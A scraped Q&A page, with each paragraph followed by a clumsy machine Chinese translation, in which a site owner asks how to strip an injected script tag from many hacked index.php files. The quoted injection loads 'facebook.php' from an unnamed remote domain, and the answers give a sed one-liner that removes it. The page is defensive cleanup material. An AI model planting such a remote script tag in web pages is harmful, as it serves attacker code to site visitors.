Linux命令行:编辑被入侵的索引文件

时间:2021-11-23 00:14:18

I'm unfortunately once more dealing with a hacked site on a Linux Plesk server. While the issue is fixed with FTP access changed (it got down to the famous Filezilla FTP codes hack on a PC) I'd appreciate to know how to edit files as it may take over an hour to restore the site to the most recent backup we have, and I'd be glad to have it back online faster. The hack is rather simple: a javascript code was inserted in many index* (only index.php it seems) files in the site. I'm looking for a way to mass-edit the hacked files, knowing that even though the target javascript code is the same, it is called from a number of probably also hacked sites. So while my legitimate index file used to start with

不幸的是,我又一次在处理Linux Plesk服务器上被黑客攻击的站点。而问题是固定的FTP访问改变了(它下来到著名Filezilla FTP密码破解电脑)我会感激知道如何编辑文件,因为它可能需要一个多小时恢复网站最近的备份,并且我很乐意把它重新上线速度更快。黑客是相当简单的:在许多索引*(只有索引)中插入了一个javascript代码。看起来是php)站点中的文件。我正在寻找一种方法来大量编辑被黑客攻击的文件,我知道即使目标javascript代码是相同的,它也会从许多可能也被黑客攻击的站点调用。我的合法索引文件开始

<?php

it now starts like

现在开始喜欢

<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php

As that chain contains a variable, could you help me find a sure-fire method to edit all the changed Index files (about 80 found) ? I have used a SED replace before but this time part of the chain to replace varies, so could I use a wildcard ? Best regards, thanks for shedding light !

由于该链包含一个变量,您能帮助我找到一个确定的方法来编辑所有修改的索引文件(大约找到80个)吗?我以前用过SED替换,但是这次链的替换部分是可变的,所以我可以用通配符吗?致以最良好的问候,谢谢你的光芒!

3 个解决方案

#1


3  

find -name 'index.php' -print0 |
    xargs -0 sed -i '1s#^<script type="text/javascript" src="http://.*\?/facebook.php"></script>##g'

Should do wonders

应该创造奇迹

the sed command:

sed命令:

  • 1 (match in first line)
  • 1(第一行匹配)
  • s#pattern#replacement#g (replace pattern by replacement, not that the latter is empty)
  • 模式#替换#g(替换模式替换,而不是后者是空的)
  • ^ must match at start of line
  • ^必须匹配的开始
  • .*\? accept arbitrary length of sequence of characters; however if more than one a match for the whole pattern could be made, only match the shortest possible variant of it
  • . * \ ?接受任意长度的字符序列;但是,如果可以对整个模式进行多个匹配,那么只匹配它的最短可能的变体。

Cheers

干杯

#2


1  

I sincerely hope your not actually adminning a production domain. You should inform your users, get the problem fixed, offer the users to go back to a recent backup that hasn't got the problem.

我真诚地希望您不要实际管理一个生产领域。您应该通知您的用户,修复问题,并让用户返回到最近的备份中,该备份没有得到问题。

There is no telling what else has been tampered with.

没有人知道还有什么被篡改过。

I'm glad my VPS is somewhere else!

我很高兴我的副总裁在别的地方!

#3


-1  

I would fix the Cross side scripting exploit before this problem is addressed or it will all be in vain. When thats done a simple search and replace of blocks of script that contain a common string should be sufficient.

在解决这个问题之前,我将修复交叉端脚本攻击,否则这一切都将徒劳无功。当它完成时,一个简单的搜索和替换包含公共字符串的脚本块就足够了。

#1


3  

find -name 'index.php' -print0 |
    xargs -0 sed -i '1s#^<script type="text/javascript" src="http://.*\?/facebook.php"></script>##g'

Should do wonders

应该创造奇迹

the sed command:

sed命令:

  • 1 (match in first line)
  • 1(第一行匹配)
  • s#pattern#replacement#g (replace pattern by replacement, not that the latter is empty)
  • 模式#替换#g(替换模式替换,而不是后者是空的)
  • ^ must match at start of line
  • ^必须匹配的开始
  • .*\? accept arbitrary length of sequence of characters; however if more than one a match for the whole pattern could be made, only match the shortest possible variant of it
  • . * \ ?接受任意长度的字符序列;但是,如果可以对整个模式进行多个匹配,那么只匹配它的最短可能的变体。

Cheers

干杯

#2


1  

I sincerely hope your not actually adminning a production domain. You should inform your users, get the problem fixed, offer the users to go back to a recent backup that hasn't got the problem.

我真诚地希望您不要实际管理一个生产领域。您应该通知您的用户,修复问题,并让用户返回到最近的备份中,该备份没有得到问题。

There is no telling what else has been tampered with.

没有人知道还有什么被篡改过。

I'm glad my VPS is somewhere else!

我很高兴我的副总裁在别的地方!

#3


-1  

I would fix the Cross side scripting exploit before this problem is addressed or it will all be in vain. When thats done a simple search and replace of blocks of script that contain a common string should be sufficient.

在解决这个问题之前,我将修复交叉端脚本攻击,否则这一切都将徒劳无功。当它完成时,一个简单的搜索和替换包含公共字符串的脚本块就足够了。